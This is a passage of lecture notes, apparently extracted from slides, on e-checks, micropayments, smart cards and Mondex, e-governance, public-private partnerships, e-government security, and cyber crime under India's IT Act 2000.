a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
